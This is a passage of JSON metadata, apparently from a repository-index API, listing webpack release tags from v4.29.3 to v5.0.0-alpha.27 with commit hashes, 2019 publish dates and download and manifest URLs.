5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3",